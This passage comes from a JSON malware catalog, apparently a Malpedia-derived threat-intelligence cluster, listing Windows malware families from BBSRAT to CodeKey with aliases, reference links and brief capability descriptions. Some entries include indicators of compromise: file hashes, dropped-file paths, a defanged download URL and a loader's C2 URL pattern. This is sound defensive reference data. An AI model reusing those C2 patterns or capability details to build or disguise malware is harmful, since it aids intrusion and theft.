"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [], "type": [] }, "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" ], "synonyms": [], "type": [] }, "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", "value": "Bedep" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" ], "synonyms": [], "type": [] }, "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", "value": "BernhardPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", "http://www.xylibox.com/2015/04/betabot-retrospective.html", "https://asert.arbornetworks.com/beta-bot-a-code-review/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" ], "synonyms": [ "Neurevt" ], "type": [] }, "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" ], "synonyms": [], "type": [] }, "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", "value": "BfBot" }, { "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://habrahabr.ru/post/213973/", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" ], "synonyms": [], "type": [] }, "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "zxdosml" ], "type": [] }, "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", "value": "Biscuit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" ], "synonyms": [], "type": [] }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", "https://www.evild3ad.com/405/bka-trojaner-ransomware/" ], "synonyms": [ "bwin3_bka" ], "type": [] }, "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", 
"value": "BKA Trojaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], "type": [] }, "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", "value": "BlackEnergy" }, { "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" ], "synonyms": [ "Kaptoxa", "POSWDS", "Reedum" ], "type": [] }, "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", "value": "BlackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" ], "synonyms": [], "type": [] }, "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", 
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" ], "synonyms": [], "type": [] }, "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", "value": "BlackShades" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", "value": "Boaxxe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" ], "synonyms": [], "type": [] }, "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", "value": "Bohmini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", "https://asert.arbornetworks.com/communications-bolek-trojan/", "http://www.cert.pl/news/11379" ], "synonyms": [ "KBOT" ], "type": [] }, "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", "value": "Bouncer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" ], "synonyms": [], "type": [] }, "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", 
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", "value": "Brambul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "fbed27da-551d-4793-ba7e-128256326909", "value": "BravoNC" }, { "description": "There is no reference available for this family, and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication URL parameters are fairly unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\nThe os parameter is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" ], "synonyms": [], "type": [] }, "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", "value": "Breakthrough" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" ], "synonyms": [], "type": [] }, "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" ], "synonyms": [], "type": [] }, "uuid": 
"e413c33a-badd-49a1-8d44-c9a0983b5151", "value": "BrutPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", "value": "BS2005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" ], "synonyms": [], "type": [] }, "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" ], "synonyms": [], "type": [] }, "uuid": "16794655-c0e2-4510-9169-f862df104045", "value": "Bugat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" ], "synonyms": [ "Ratopak" ], "type": [] }, "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", "value": "Buhtrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", "https://www.f-secure.com/weblog/archives/00002249.html", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" ], "synonyms": [ "0zapftis", "R2D2" ], "type": [] }, "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", "value": "Bundestrojaner" }, { "description": "Bunitu is a trojan that 
exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], "synonyms": [], "type": [] }, "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", "value": "Bunitu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" ], "synonyms": [ "spyvoltar" ], "type": [] }, "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", "value": "Buterat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A" ], "synonyms": [ "Yimfoca" ], "type": [] }, "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", "value": "Buzus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" ], "synonyms": [], "type": [] }, "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", "value": "BYEBY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" ], "synonyms": [], "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", "value": "c0d0so0" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" ], "synonyms": [], "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", "value": "CabArt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [ "Cadelle" ], "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", "value": "CadelSpy" }, { "description": "There are not many IOCs in this article, so we took one sample and tried to extract some interesting IOCs; our findings are below:\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe tries to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys sets 28 IRP handlers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" ], "synonyms": [], "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", "value": "CamuBot" }, { "description": "Cannibal Rat is a Python-written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. 
The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" ], "synonyms": [], "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", "value": "Cannibal Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3fada5b6-0b3d-4b83-97c9-2157c959704c", "value": "Cannon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" ], "synonyms": [ "Anunak" ], "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", "value": "Carbanak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" ], "synonyms": [], "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", "value": "Carberp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. 
Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" ], "synonyms": [], "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", "value": "Casper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", "value": "Catchamas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", "https://blog.avast.com/progress-on-ccleaner-investigation", "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", "https://twitter.com/craiu/status/910148928796061696", "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", 
"https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" ], "synonyms": [], "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", "value": "CCleaner Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" ], "synonyms": [ "cerebrus" ], "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", "value": "CenterPOS" }, { "description": "A prolific ransomware that originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of UDP activity to check in and report infections. Primarily uses TOR for payment information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" ], "synonyms": [], "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", "value": "Cerber" }, { "description": "This malware family delivers its artifacts packed with free and generic packers. 
It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" ], "synonyms": [], "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", "value": "Cerbu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" ], "synonyms": [], "type": [] }, "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [ "Ham Backdoor" ], "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", "value": "ChChes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" ], "synonyms": [ "cherry_picker", "cherrypicker", "cherrypickerpos" ], "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", "value": "CherryPicker POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", 
"http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" ], "synonyms": [], "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" ], "synonyms": [], "type": [] }, "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", "value": "Chinad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" ], "synonyms": [], "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", "value": "Chir" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.s21sec.com/en/blog/2017/07/androkins/", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" ], "synonyms": [ "AndroKINS" ], "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", "value": "Chthonic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" ], "synonyms": [], "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", "value": "Citadel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" ], "synonyms": [], "type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", 
"value": "Client Maximus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" ], "synonyms": [], "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", "value": "Cloud Duke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" ], "synonyms": [], "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", "value": "CMSBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [ "meciv" ], "type": [] }, "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", "value": "CMSTAR" }, { "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. 
Beacon provides the attacker with a wealth of functionality, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" ], "synonyms": [], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", "value": "Cobalt Strike" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" ], "synonyms": [], "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", "value": "Cobian RAT" }, { "description": "CobInt is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. 
If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://www.group-ib.com/blog/renaissance" ], "synonyms": [ "COOLPANTS" ], "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", "value": "CobInt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://github.com/hfiref0x/TDL", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" ], "synonyms": [ "Carbon" ], "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", "value": "Cobra Carbon System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" ], "synonyms": [], "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", "value": "CockBlocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" ], "synonyms": [], "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", "value": "CodeKey" }, { "description": "", "meta": { "refs": [ 